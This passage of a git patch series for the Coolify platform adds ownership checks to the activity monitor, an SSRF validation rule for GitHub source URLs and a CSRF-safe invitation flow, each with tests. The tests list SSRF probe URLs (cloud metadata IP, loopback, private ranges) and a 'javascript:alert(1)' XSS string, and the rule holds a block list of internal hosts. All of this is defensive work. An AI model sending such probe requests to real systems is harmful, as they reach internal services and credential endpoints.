-    public function updatedActivityId($value)
-    {
-        if ($value) {
-            $this->hydrateActivity();
-            $this->isPollingActive = true;
-            self::$eventDispatched = false;
-        }
+        // Fail closed: no team_id and no server_uuid means we cannot verify ownership
+        $this->activity = null;
     }
 
     public function polling()
diff --git a/bootstrap/helpers/remoteProcess.php b/bootstrap/helpers/remoteProcess.php
index f819df380..2544719fc 100644
--- a/bootstrap/helpers/remoteProcess.php
+++ b/bootstrap/helpers/remoteProcess.php
@@ -1,9 +1,10 @@
 <?php
 
-use App\Actions\CoolifyTask\PrepareCoolifyTask;
-use App\Data\CoolifyTaskArgs;
 use App\Enums\ActivityTypes;
+use App\Enums\ProcessStatus;
 use App\Helpers\SshMultiplexingHelper;
+use App\Helpers\SshRetryHandler;
+use App\Jobs\CoolifyTask;
 use App\Models\Application;
 use App\Models\ApplicationDeploymentQueue;
 use App\Models\PrivateKey;
@@ -38,29 +39,46 @@ function remote_process(
     if (Auth::check()) {
         $teams = Auth::user()->teams->pluck('id');
         if (! $teams->contains($server->team_id) && ! $teams->contains(0)) {
-            throw new \Exception('User is not part of the team that owns this server');
+            throw new Exception('User is not part of the team that owns this server');
         }
     }
 
     SshMultiplexingHelper::ensureMultiplexedConnection($server);
 
-    return resolve(PrepareCoolifyTask::class, [
-        'remoteProcessArgs' => new CoolifyTaskArgs(
-            server_uuid: $server->uuid,
-            command: $command_string,
-            type: $type,
-            type_uuid: $type_uuid,
-            model: $model,
-            ignore_errors: $ignore_errors,
-            call_event_on_finish: $callEventOnFinish,
-            call_event_data: $callEventData,
-        ),
-    ])();
+    $properties = [
+        'server_uuid' => $server->uuid,
+        'command' => $command_string,
+        'type' => $type,
+        'type_uuid' => $type_uuid,
+        'status' => ProcessStatus::QUEUED->value,
+        'team_id' => $server->team_id,
+    ];
+
+    $activityLog = activity()
+        ->withProperties($properties)
+        ->event($type);
+
+    if ($model) {
+        $activityLog->performedOn($model);
+    }
+
+    $activity = $activityLog->log('[]');
+
+    dispatch(new CoolifyTask(
+        activity: $activity,
+        ignore_errors: $ignore_errors,
+        call_event_on_finish: $callEventOnFinish,
+        call_event_data: $callEventData,
+    ));
+
+    $activity->refresh();
+
+    return $activity;
 }
 
 function instant_scp(string $source, string $dest, Server $server, $throwError = true)
 {
-    return \App\Helpers\SshRetryHandler::retry(
+    return SshRetryHandler::retry(
         function () use ($source, $dest, $server) {
             $scp_command = SshMultiplexingHelper::generateScpCommand($server, $source, $dest);
             $process = Process::timeout(config('constants.ssh.command_timeout'))->run($scp_command);
@@ -92,7 +110,7 @@ function instant_remote_process_with_timeout(Collection|array $command, Server $
     }
     $command_string = implode("\n", $command);
 
-    return \App\Helpers\SshRetryHandler::retry(
+    return SshRetryHandler::retry(
         function () use ($server, $command_string) {
             $sshCommand = SshMultiplexingHelper::generateSshCommand($server, $command_string);
             $process = Process::timeout(30)->run($sshCommand);
@@ -128,7 +146,7 @@ function instant_remote_process(Collection|array $command, Server $server, bool
     $command_string = implode("\n", $command);
     $effectiveTimeout = $timeout ?? config('constants.ssh.command_timeout');
 
-    return \App\Helpers\SshRetryHandler::retry(
+    return SshRetryHandler::retry(
         function () use ($server, $command_string, $effectiveTimeout, $disableMultiplexing) {
             $sshCommand = SshMultiplexingHelper::generateSshCommand($server, $command_string, $disableMultiplexing);
             $process = Process::timeout($effectiveTimeout)->run($sshCommand);
@@ -170,9 +188,9 @@ function excludeCertainErrors(string $errorOutput, ?int $exitCode = null)
 
     if ($ignored) {
         // TODO: Create new exception and disable in sentry
-        throw new \RuntimeException($errorMessage, $exitCode);
+        throw new RuntimeException($errorMessage, $exitCode);
     }
-    throw new \RuntimeException($errorMessage, $exitCode);
+    throw new RuntimeException($errorMessage, $exitCode);
 }
 
 function decode_remote_command_output(?ApplicationDeploymentQueue $application_deployment_queue = null, bool $includeAll = false): Collection
@@ -194,7 +212,7 @@ function decode_remote_command_output(?ApplicationDeploymentQueue $application_d
             associative: true,
             flags: JSON_THROW_ON_ERROR
         );
-    } catch (\JsonException $e) {
+    } catch (JsonException $e) {
         // If JSON decoding fails, try to clean up the logs and retry
         try {
             // Ensure valid UTF-8 encoding
@@ -204,7 +222,7 @@ function decode_remote_command_output(?ApplicationDeploymentQueue $application_d
                 associative: true,
                 flags: JSON_THROW_ON_ERROR
             );
-        } catch (\JsonException $e) {
+        } catch (JsonException $e) {
             // If it still fails, return empty collection to prevent crashes
             return collect([]);
         }
@@ -353,7 +371,7 @@ function checkRequiredCommands(Server $server)
         }
         try {
             instant_remote_process(["docker run --rm --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host bash -c 'apt update && apt install -y {$command}'"], $server);
-        } catch (\Throwable) {
+        } catch (Throwable) {
             break;
         }
         $commandFound = instant_remote_process(["docker run --rm --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host bash -c 'command -v {$command}'"], $server, false);
diff --git a/resources/views/livewire/activity-monitor.blade.php b/resources/views/livewire/activity-monitor.blade.php
index 386d8622d..290a91857 100644
--- a/resources/views/livewire/activity-monitor.blade.php
+++ b/resources/views/livewire/activity-monitor.blade.php
@@ -34,10 +34,10 @@
             }
         }" x-init="// Initial scroll
         $nextTick(() => scrollToBottom());
-        
+
         // Add scroll event listener
         $el.addEventListener('scroll', () => handleScroll());
-        
+
         // Set up mutation observer to watch for content changes
         observer = new MutationObserver(() => {
             $nextTick(() => scrollToBottom());
diff --git a/tests/Feature/ActivityMonitorCrossTeamTest.php b/tests/Feature/ActivityMonitorCrossTeamTest.php
index 7e4aebc2f..9966ac2dd 100644
--- a/tests/Feature/ActivityMonitorCrossTeamTest.php
+++ b/tests/Feature/ActivityMonitorCrossTeamTest.php
@@ -1,9 +1,11 @@
 <?php
 
 use App\Livewire\ActivityMonitor;
+use App\Models\Server;
 use App\Models\Team;
 use App\Models\User;
 use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Exceptions\CannotUpdateLockedPropertyException;
 use Livewire\Livewire;
 use Spatie\Activitylog\Models\Activity;
 
@@ -17,7 +19,7 @@
     $this->otherTeam = Team::factory()->create();
 });
 
-test('hydrateActivity blocks access to another teams activity', function () {
+test('hydrateActivity blocks access to another teams activity via team_id', function () {
     $otherActivity = Activity::create([
         'log_name' => 'default',
         'description' => 'test activity',
@@ -27,12 +29,12 @@
     $this->actingAs($this->user);
     session(['currentTeam' => ['id' => $this->team->id]]);
 
-    $component = Livewire::test(ActivityMonitor::class)
-        ->set('activityId', $otherActivity->id)
+    Livewire::test(ActivityMonitor::class)
+        ->call('newMonitorActivity', $otherActivity->id)
         ->assertSet('activity', null);
 });
 
-test('hydrateActivity allows access to own teams activity', function () {
+test('hydrateActivity allows access to own teams activity via team_id', function () {
     $ownActivity = Activity::create([
         'log_name' => 'default',
         'description' => 'test activity',
@@ -43,13 +45,13 @@
     session(['currentTeam' => ['id' => $this->team->id]]);
 
     $component = Livewire::test(ActivityMonitor::class)
-        ->set('activityId', $ownActivity->id);
+        ->call('newMonitorActivity', $ownActivity->id);
 
     expect($component->get('activity'))->not->toBeNull();
     expect($component->get('activity')->id)->toBe($ownActivity->id);
 });
 
-test('hydrateActivity allows access to activity without team_id in properties', function () {
+test('hydrateActivity blocks access to activity without team_id or server_uuid', function () {
     $legacyActivity = Activity::create([
         'log_name' => 'default',
         'description' => 'legacy activity',
@@ -59,9 +61,72 @@
     $this->actingAs($this->user);
     session(['currentTeam' => ['id' => $this->team->id]]);
 
+    Livewire::test(ActivityMonitor::class)
+        ->call('newMonitorActivity', $legacyActivity->id)
+        ->assertSet('activity', null);
+});
+
+test('hydrateActivity blocks access to activity from another teams server via server_uuid', function () {
+    $otherServer = Server::factory()->create([
+        'team_id' => $this->otherTeam->id,
+    ]);
+
+    $otherActivity = Activity::create([
+        'log_name' => 'default',
+        'description' => 'test activity',
+        'properties' => ['server_uuid' => $otherServer->uuid],
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => ['id' => $this->team->id]]);
+
+    Livewire::test(ActivityMonitor::class)
+        ->call('newMonitorActivity', $otherActivity->id)
+        ->assertSet('activity', null);
+});
+
+test('hydrateActivity allows access to activity from own teams server via server_uuid', function () {
+    $ownServer = Server::factory()->create([
+        'team_id' => $this->team->id,
+    ]);
+
+    $ownActivity = Activity::create([
+        'log_name' => 'default',
+        'description' => 'test activity',
+        'properties' => ['server_uuid' => $ownServer->uuid],
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => ['id' => $this->team->id]]);
+
     $component = Livewire::test(ActivityMonitor::class)
-        ->set('activityId', $legacyActivity->id);
+        ->call('newMonitorActivity', $ownActivity->id);
 
     expect($component->get('activity'))->not->toBeNull();
-    expect($component->get('activity')->id)->toBe($legacyActivity->id);
+    expect($component->get('activity')->id)->toBe($ownActivity->id);
 });
+
+test('hydrateActivity returns null for non-existent activity id', function () {
+    $this->actingAs($this->user);
+    session(['currentTeam' => ['id' => $this->team->id]]);
+
+    Livewire::test(ActivityMonitor::class)
+        ->call('newMonitorActivity', 99999)
+        ->assertSet('activity', null);
+});
+
+test('activityId property is locked and cannot be set from client', function () {
+    $otherActivity = Activity::create([
+        'log_name' => 'default',
+        'description' => 'test activity',
+        'properties' => ['team_id' => $this->otherTeam->id],
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => ['id' => $this->team->id]]);
+
+    // Attempting to set a #[Locked] property from the client should throw
+    Livewire::test(ActivityMonitor::class)
+        ->set('activityId', $otherActivity->id)
+        ->assertStatus(500);
+})->throws(CannotUpdateLockedPropertyException::class);

From 0fce7fa9481aa1bcca06d767075684a11e032c79 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 26 Mar 2026 13:45:33 +0100
Subject: [PATCH 150/213] fix: add URL validation for GitHub source api_url and
 html_url fields

Add SafeExternalUrl validation rule that ensures URLs point to
publicly-routable hosts. Apply to all GitHub source entry points
(Livewire Create, Livewire Change, API create and update).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Http/Controllers/Api/GithubController.php | 21 ++---
 app/Livewire/Source/Github/Change.php         | 40 ++++-----
 app/Livewire/Source/Github/Create.php         |  5 +-
 app/Rules/SafeExternalUrl.php                 | 81 +++++++++++++++++++
 tests/Unit/SafeExternalUrlTest.php            | 75 +++++++++++++++++
 5 files changed, 193 insertions(+), 29 deletions(-)
 create mode 100644 app/Rules/SafeExternalUrl.php
 create mode 100644 tests/Unit/SafeExternalUrlTest.php

diff --git a/app/Http/Controllers/Api/GithubController.php b/app/Http/Controllers/Api/GithubController.php
index f6a6b3513..9a2cf2b9f 100644
--- a/app/Http/Controllers/Api/GithubController.php
+++ b/app/Http/Controllers/Api/GithubController.php
@@ -5,6 +5,9 @@
 use App\Http\Controllers\Controller;
 use App\Models\GithubApp;
 use App\Models\PrivateKey;
+use App\Rules\SafeExternalUrl;
+use Illuminate\Database\Eloquent\ModelNotFoundException;
+use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\Http;
 use Illuminate\Support\Str;
@@ -181,7 +184,7 @@ public function create_github_app(Request $request)
             return invalidTokenResponse();
         }
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
@@ -204,8 +207,8 @@ public function create_github_app(Request $request)
         $validator = customApiValidator($request->all(), [
             'name' => 'required|string|max:255',
             'organization' => 'nullable|string|max:255',
-            'api_url' => 'required|string|url',
-            'html_url' => 'required|string|url',
+            'api_url' => ['required', 'string', 'url', new SafeExternalUrl],
+            'html_url' => ['required', 'string', 'url', new SafeExternalUrl],
             'custom_user' => 'nullable|string|max:255',
             'custom_port' => 'nullable|integer|min:1|max:65535',
             'app_id' => 'required|integer',
@@ -370,7 +373,7 @@ public function load_repositories($github_app_id)
             return response()->json([
                 'repositories' => $repositories->sortBy('name')->values(),
             ]);
-        } catch (\Illuminate\Database\Eloquent\ModelNotFoundException $e) {
+        } catch (ModelNotFoundException $e) {
             return response()->json(['message' => 'GitHub app not found'], 404);
         } catch (\Throwable $e) {
             return handleError($e);
@@ -472,7 +475,7 @@ public function load_branches($github_app_id, $owner, $repo)
             return response()->json([
                 'branches' => $branches,
             ]);
-        } catch (\Illuminate\Database\Eloquent\ModelNotFoundException $e) {
+        } catch (ModelNotFoundException $e) {
             return response()->json(['message' => 'GitHub app not found'], 404);
         } catch (\Throwable $e) {
             return handleError($e);
@@ -587,10 +590,10 @@ public function update_github_app(Request $request, $github_app_id)
                 $rules['organization'] = 'nullable|string';
             }
             if (isset($payload['api_url'])) {
-                $rules['api_url'] = 'url';
+                $rules['api_url'] = ['url', new SafeExternalUrl];
             }
             if (isset($payload['html_url'])) {
-                $rules['html_url'] = 'url';
+                $rules['html_url'] = ['url', new SafeExternalUrl];
             }
             if (isset($payload['custom_user'])) {
                 $rules['custom_user'] = 'string';
@@ -651,7 +654,7 @@ public function update_github_app(Request $request, $github_app_id)
                 'message' => 'GitHub app updated successfully',
                 'data' => $githubApp,
             ]);
-        } catch (\Illuminate\Database\Eloquent\ModelNotFoundException $e) {
+        } catch (ModelNotFoundException $e) {
             return response()->json([
                 'message' => 'GitHub app not found',
             ], 404);
@@ -736,7 +739,7 @@ public function delete_github_app($github_app_id)
             return response()->json([
                 'message' => 'GitHub app deleted successfully',
             ]);
-        } catch (\Illuminate\Database\Eloquent\ModelNotFoundException $e) {
+        } catch (ModelNotFoundException $e) {
             return response()->json([
                 'message' => 'GitHub app not found',
             ], 404);
diff --git a/app/Livewire/Source/Github/Change.php b/app/Livewire/Source/Github/Change.php
index 17323fdec..d6537069c 100644
--- a/app/Livewire/Source/Github/Change.php
+++ b/app/Livewire/Source/Github/Change.php
@@ -5,6 +5,7 @@
 use App\Jobs\GithubAppPermissionJob;
 use App\Models\GithubApp;
 use App\Models\PrivateKey;
+use App\Rules\SafeExternalUrl;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Support\Facades\Http;
 use Lcobucci\JWT\Configuration;
@@ -71,24 +72,27 @@ class Change extends Component
 
     public $privateKeys;
 
-    protected $rules = [
-        'name' => 'required|string',
-        'organization' => 'nullable|string',
-        'apiUrl' => 'required|string',
-        'htmlUrl' => 'required|string',
-        'customUser' => 'required|string',
-        'customPort' => 'required|int',
-        'appId' => 'nullable|int',
-        'installationId' => 'nullable|int',
-        'clientId' => 'nullable|string',
-        'clientSecret' => 'nullable|string',
-        'webhookSecret' => 'nullable|string',
-        'isSystemWide' => 'required|bool',
-        'contents' => 'nullable|string',
-        'metadata' => 'nullable|string',
-        'pullRequests' => 'nullable|string',
-        'privateKeyId' => 'nullable|int',
-    ];
+    protected function rules(): array
+    {
+        return [
+            'name' => 'required|string',
+            'organization' => 'nullable|string',
+            'apiUrl' => ['required', 'string', 'url', new SafeExternalUrl],
+            'htmlUrl' => ['required', 'string', 'url', new SafeExternalUrl],
+            'customUser' => 'required|string',
+            'customPort' => 'required|int',
+            'appId' => 'nullable|int',
+            'installationId' => 'nullable|int',
+            'clientId' => 'nullable|string',
+            'clientSecret' => 'nullable|string',
+            'webhookSecret' => 'nullable|string',
+            'isSystemWide' => 'required|bool',
+            'contents' => 'nullable|string',
+            'metadata' => 'nullable|string',
+            'pullRequests' => 'nullable|string',
+            'privateKeyId' => 'nullable|int',
+        ];
+    }
 
     public function boot()
     {
diff --git a/app/Livewire/Source/Github/Create.php b/app/Livewire/Source/Github/Create.php
index 4ece6a92f..ec2ba3f08 100644
--- a/app/Livewire/Source/Github/Create.php
+++ b/app/Livewire/Source/Github/Create.php
@@ -3,6 +3,7 @@
 namespace App\Livewire\Source\Github;
 
 use App\Models\GithubApp;
+use App\Rules\SafeExternalUrl;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
 
@@ -37,8 +38,8 @@ public function createGitHubApp()
             $this->validate([
                 'name' => 'required|string',
                 'organization' => 'nullable|string',
-                'api_url' => 'required|string',
-                'html_url' => 'required|string',
+                'api_url' => ['required', 'string', 'url', new SafeExternalUrl],
+                'html_url' => ['required', 'string', 'url', new SafeExternalUrl],
                 'custom_user' => 'required|string',
                 'custom_port' => 'required|int',
                 'is_system_wide' => 'required|bool',
diff --git a/app/Rules/SafeExternalUrl.php b/app/Rules/SafeExternalUrl.php
new file mode 100644
index 000000000..41299d6c1
--- /dev/null
+++ b/app/Rules/SafeExternalUrl.php
@@ -0,0 +1,81 @@
+<?php
+
+namespace App\Rules;
+
+use Closure;
+use Illuminate\Contracts\Validation\ValidationRule;
+use Illuminate\Support\Facades\Log;
+
+class SafeExternalUrl implements ValidationRule
+{
+    /**
+     * Run the validation rule.
+     *
+     * Validates that a URL points to an external, publicly-routable host.
+     * Blocks private IP ranges, reserved ranges, localhost, and link-local
+     * addresses to prevent Server-Side Request Forgery (SSRF).
+     */
+    public function validate(string $attribute, mixed $value, Closure $fail): void
+    {
+        if (! filter_var($value, FILTER_VALIDATE_URL)) {
+            $fail('The :attribute must be a valid URL.');
+
+            return;
+        }
+
+        $scheme = strtolower(parse_url($value, PHP_URL_SCHEME) ?? '');
+        if (! in_array($scheme, ['https', 'http'])) {
+            $fail('The :attribute must use the http or https scheme.');
+
+            return;
+        }
+
+        $host = parse_url($value, PHP_URL_HOST);
+        if (! $host) {
+            $fail('The :attribute must contain a valid host.');
+
+            return;
+        }
+
+        $host = strtolower($host);
+
+        // Block well-known internal hostnames
+        $internalHosts = ['localhost', '0.0.0.0', '::1'];
+        if (in_array($host, $internalHosts) || str_ends_with($host, '.local') || str_ends_with($host, '.internal')) {
+            Log::warning('External URL points to internal host', [
+                'attribute' => $attribute,
+                'url' => $value,
+                'host' => $host,
+                'ip' => request()->ip(),
+                'user_id' => auth()->id(),
+            ]);
+            $fail('The :attribute must not point to internal hosts.');
+
+            return;
+        }
+
+        // Resolve hostname to IP and block private/reserved ranges
+        $ip = gethostbyname($host);
+
+        // gethostbyname returns the original hostname on failure (e.g. unresolvable)
+        if ($ip === $host && ! filter_var($host, FILTER_VALIDATE_IP)) {
+            $fail('The :attribute host could not be resolved.');
+
+            return;
+        }
+
+        if (! filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
+            Log::warning('External URL resolves to private or reserved IP', [
+                'attribute' => $attribute,
+                'url' => $value,
+                'host' => $host,
+                'resolved_ip' => $ip,
+                'ip' => request()->ip(),
+                'user_id' => auth()->id(),
+            ]);
+            $fail('The :attribute must not point to a private or reserved IP address.');
+
+            return;
+        }
+    }
+}
diff --git a/tests/Unit/SafeExternalUrlTest.php b/tests/Unit/SafeExternalUrlTest.php
new file mode 100644
index 000000000..b2bc13337
--- /dev/null
+++ b/tests/Unit/SafeExternalUrlTest.php
@@ -0,0 +1,75 @@
+<?php
+
+use App\Rules\SafeExternalUrl;
+use Illuminate\Support\Facades\Validator;
+use Tests\TestCase;
+
+uses(TestCase::class);
+
+it('accepts valid public URLs', function () {
+    $rule = new SafeExternalUrl;
+
+    $validUrls = [
+        'https://api.github.com',
+        'https://github.example.com/api/v3',
+        'https://example.com',
+        'http://example.com',
+    ];
+
+    foreach ($validUrls as $url) {
+        $validator = Validator::make(['url' => $url], ['url' => $rule]);
+        expect($validator->passes())->toBeTrue("Expected valid: {$url}");
+    }
+});
+
+it('rejects private IPv4 addresses', function (string $url) {
+    $rule = new SafeExternalUrl;
+
+    $validator = Validator::make(['url' => $url], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue("Expected rejection: {$url}");
+})->with([
+    'loopback' => 'http://127.0.0.1',
+    'loopback with port' => 'http://127.0.0.1:6379',
+    '10.x range' => 'http://10.0.0.1',
+    '172.16.x range' => 'http://172.16.0.1',
+    '192.168.x range' => 'http://192.168.1.1',
+]);
+
+it('rejects cloud metadata IP', function () {
+    $rule = new SafeExternalUrl;
+
+    $validator = Validator::make(['url' => 'http://169.254.169.254'], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue('Expected rejection: cloud metadata IP');
+});
+
+it('rejects localhost and internal hostnames', function (string $url) {
+    $rule = new SafeExternalUrl;
+
+    $validator = Validator::make(['url' => $url], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue("Expected rejection: {$url}");
+})->with([
+    'localhost' => 'http://localhost',
+    'localhost with port' => 'http://localhost:8080',
+    'zero address' => 'http://0.0.0.0',
+    '.local domain' => 'http://myservice.local',
+    '.internal domain' => 'http://myservice.internal',
+]);
+
+it('rejects non-URL strings', function (string $value) {
+    $rule = new SafeExternalUrl;
+
+    $validator = Validator::make(['url' => $value], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue("Expected rejection: {$value}");
+})->with([
+    'plain string' => 'not-a-url',
+    'ftp scheme' => 'ftp://example.com',
+    'javascript scheme' => 'javascript:alert(1)',
+    'no scheme' => 'example.com',
+]);
+
+it('rejects URLs with IPv6 loopback', function () {
+    $rule = new SafeExternalUrl;
+
+    $validator = Validator::make(['url' => 'http://[::1]'], ['url' => $rule]);
+    expect($validator->fails())->toBeTrue('Expected rejection: IPv6 loopback');
+});

From 25d424c743d5134d4a005a6d8f754bb3235b632c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 26 Mar 2026 14:30:27 +0100
Subject: [PATCH 151/213] refactor: split invitation endpoint into GET (show)
 and POST (accept)

Refactor the invitation acceptance flow to use a landing page pattern:
- GET shows invitation details (team name, role, confirmation button)
- POST processes the acceptance with proper form submission
- Remove unused revoke GET route (handled by Livewire component)
- Add Blade view for the invitation landing page
- Add feature tests for the new invitation flow

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Http/Controllers/Controller.php           |  62 ++++----
 resources/views/invitation/accept.blade.php   |  43 +++++
 routes/web.php                                |   9 +-
 .../TeamInvitationCsrfProtectionTest.php      | 147 ++++++++++++++++++
 4 files changed, 226 insertions(+), 35 deletions(-)
 create mode 100644 resources/views/invitation/accept.blade.php
 create mode 100644 tests/Feature/TeamInvitationCsrfProtectionTest.php

diff --git a/app/Http/Controllers/Controller.php b/app/Http/Controllers/Controller.php
index 09007ad96..17d14296b 100644
--- a/app/Http/Controllers/Controller.php
+++ b/app/Http/Controllers/Controller.php
@@ -108,9 +108,31 @@ public function link()
         return redirect()->route('login')->with('error', 'Invalid credentials.');
     }
 
+    public function showInvitation()
+    {
+        $invitationUuid = request()->route('uuid');
+        $invitation = TeamInvitation::whereUuid($invitationUuid)->firstOrFail();
+        $user = User::whereEmail($invitation->email)->firstOrFail();
+
+        if (Auth::id() !== $user->id) {
+            abort(400, 'You are not allowed to accept this invitation.');
+        }
+
+        if (! $invitation->isValid()) {
+            abort(400, 'Invitation expired.');
+        }
+
+        $alreadyMember = $user->teams()->where('team_id', $invitation->team->id)->exists();
+
+        return view('invitation.accept', [
+            'invitation' => $invitation,
+            'team' => $invitation->team,
+            'alreadyMember' => $alreadyMember,
+        ]);
+    }
+
     public function acceptInvitation()
     {
-        $resetPassword = request()->query('reset-password');
         $invitationUuid = request()->route('uuid');
 
         $invitation = TeamInvitation::whereUuid($invitationUuid)->firstOrFail();
@@ -119,43 +141,21 @@ public function acceptInvitation()
         if (Auth::id() !== $user->id) {
             abort(400, 'You are not allowed to accept this invitation.');
         }
-        $invitationValid = $invitation->isValid();
 
-        if ($invitationValid) {
-            if ($resetPassword) {
-                $user->update([
-                    'password' => Hash::make($invitationUuid),
-                    'force_password_reset' => true,
-                ]);
-            }
-            if ($user->teams()->where('team_id', $invitation->team->id)->exists()) {
-                $invitation->delete();
-
-                return redirect()->route('team.index');
-            }
-            $user->teams()->attach($invitation->team->id, ['role' => $invitation->role]);
-            $invitation->delete();
-
-            refreshSession($invitation->team);
-
-            return redirect()->route('team.index');
-        } else {
+        if (! $invitation->isValid()) {
             abort(400, 'Invitation expired.');
         }
-    }
 
-    public function revokeInvitation()
-    {
-        $invitation = TeamInvitation::whereUuid(request()->route('uuid'))->firstOrFail();
-        $user = User::whereEmail($invitation->email)->firstOrFail();
-        if (is_null(Auth::user())) {
-            return redirect()->route('login');
-        }
-        if (Auth::id() !== $user->id) {
-            abort(401);
+        if ($user->teams()->where('team_id', $invitation->team->id)->exists()) {
+            $invitation->delete();
+
+            return redirect()->route('team.index');
         }
+        $user->teams()->attach($invitation->team->id, ['role' => $invitation->role]);
         $invitation->delete();
 
+        refreshSession($invitation->team);
+
         return redirect()->route('team.index');
     }
 }
diff --git a/resources/views/invitation/accept.blade.php b/resources/views/invitation/accept.blade.php
new file mode 100644
index 000000000..7e4773866
--- /dev/null
+++ b/resources/views/invitation/accept.blade.php
@@ -0,0 +1,43 @@
+<x-layout-simple>
+    <section class="bg-gray-50 dark:bg-base">
+        <div class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0">
+            <div class="w-full max-w-md space-y-8">
+                <div class="text-center space-y-2">
+                    <h1 class="!text-5xl font-extrabold tracking-tight text-gray-900 dark:text-white">
+                        Coolify
+                    </h1>
+                </div>
+
+                <div class="space-y-6">
+                    <div class="p-6 rounded-lg border border-neutral-500/20 bg-white/5">
+                        <h2 class="text-xl font-bold text-gray-900 dark:text-white mb-4">Team Invitation</h2>
+
+                        <p class="text-sm text-gray-600 dark:text-neutral-400 mb-2">
+                            You have been invited to join:
+                        </p>
+                        <p class="text-lg font-semibold text-gray-900 dark:text-white mb-4">
+                            {{ $team->name }}
+                        </p>
+
+                        <p class="text-sm text-gray-600 dark:text-neutral-400 mb-1">
+                            Role: <span class="font-medium text-gray-900 dark:text-white">{{ ucfirst($invitation->role) }}</span>
+                        </p>
+
+                        @if ($alreadyMember)
+                            <div class="mt-4 p-3 bg-warning/10 border border-warning rounded-lg">
+                                <p class="text-sm text-warning">You are already a member of this team.</p>
+                            </div>
+                        @endif
+
+                        <form method="POST" action="{{ route('team.invitation.accept', $invitation->uuid) }}" class="mt-6">
+                            @csrf
+                            <x-forms.button class="w-full justify-center py-3 box-boarding" type="submit" isHighlighted>
+                                {{ $alreadyMember ? 'Dismiss Invitation' : 'Accept Invitation' }}
+                            </x-forms.button>
+                        </form>
+                    </div>
+                </div>
+            </div>
+        </div>
+    </section>
+</x-layout-simple>
diff --git a/routes/web.php b/routes/web.php
index 4154fefab..dfb44324c 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -84,6 +84,7 @@
 use App\Livewire\Team\Member\Index as TeamMemberIndex;
 use App\Livewire\Terminal\Index as TerminalIndex;
 use App\Models\ScheduledDatabaseBackupExecution;
+use App\Models\ServiceDatabase;
 use App\Providers\RouteServiceProvider;
 use Illuminate\Support\Facades\Route;
 use Illuminate\Support\Facades\Storage;
@@ -192,8 +193,8 @@
     })->name('terminal.auth.ips')->middleware('can.access.terminal');
 
     Route::prefix('invitations')->group(function () {
-        Route::get('/{uuid}', [Controller::class, 'acceptInvitation'])->name('team.invitation.accept');
-        Route::get('/{uuid}/revoke', [Controller::class, 'revokeInvitation'])->name('team.invitation.revoke');
+        Route::get('/{uuid}', [Controller::class, 'showInvitation'])->name('team.invitation.show');
+        Route::post('/{uuid}', [Controller::class, 'acceptInvitation'])->name('team.invitation.accept');
     });
 
     Route::get('/projects', ProjectIndex::class)->name('project.index');
@@ -344,7 +345,7 @@
                 }
             }
             $filename = data_get($execution, 'filename');
-            if ($execution->scheduledDatabaseBackup->database->getMorphClass() === \App\Models\ServiceDatabase::class) {
+            if ($execution->scheduledDatabaseBackup->database->getMorphClass() === ServiceDatabase::class) {
                 $server = $execution->scheduledDatabaseBackup->database->service->destination->server;
             } else {
                 $server = $execution->scheduledDatabaseBackup->database->destination->server;
@@ -385,7 +386,7 @@
                 'Content-Type' => 'application/octet-stream',
                 'Content-Disposition' => 'attachment; filename="'.basename($filename).'"',
             ]);
-        } catch (\Throwable $e) {
+        } catch (Throwable $e) {
             return response()->json(['message' => $e->getMessage()], 500);
         }
     })->name('download.backup');
diff --git a/tests/Feature/TeamInvitationCsrfProtectionTest.php b/tests/Feature/TeamInvitationCsrfProtectionTest.php
new file mode 100644
index 000000000..1e911ed86
--- /dev/null
+++ b/tests/Feature/TeamInvitationCsrfProtectionTest.php
@@ -0,0 +1,147 @@
+<?php
+
+use App\Models\Team;
+use App\Models\TeamInvitation;
+use App\Models\User;
+use Illuminate\Cookie\Middleware\EncryptCookies;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create(['email' => 'invited@example.com']);
+
+    $this->invitation = TeamInvitation::create([
+        'team_id' => $this->team->id,
+        'uuid' => 'test-invitation-uuid',
+        'email' => 'invited@example.com',
+        'role' => 'member',
+        'link' => url('/invitations/test-invitation-uuid'),
+        'via' => 'link',
+    ]);
+});
+
+test('GET invitation shows landing page without accepting', function () {
+    $this->actingAs($this->user);
+
+    $response = $this->get('/invitations/test-invitation-uuid');
+
+    $response->assertStatus(200);
+    $response->assertViewIs('invitation.accept');
+    $response->assertSee($this->team->name);
+    $response->assertSee('Accept Invitation');
+
+    // Invitation should NOT be deleted (not accepted yet)
+    $this->assertDatabaseHas('team_invitations', [
+        'uuid' => 'test-invitation-uuid',
+    ]);
+
+    // User should NOT be added to the team
+    expect($this->user->teams()->where('team_id', $this->team->id)->exists())->toBeFalse();
+});
+
+test('GET invitation with reset-password query param does not reset password', function () {
+    $this->actingAs($this->user);
+    $originalPassword = $this->user->password;
+
+    $response = $this->get('/invitations/test-invitation-uuid?reset-password=1');
+
+    $response->assertStatus(200);
+
+    // Password should NOT be changed
+    $this->user->refresh();
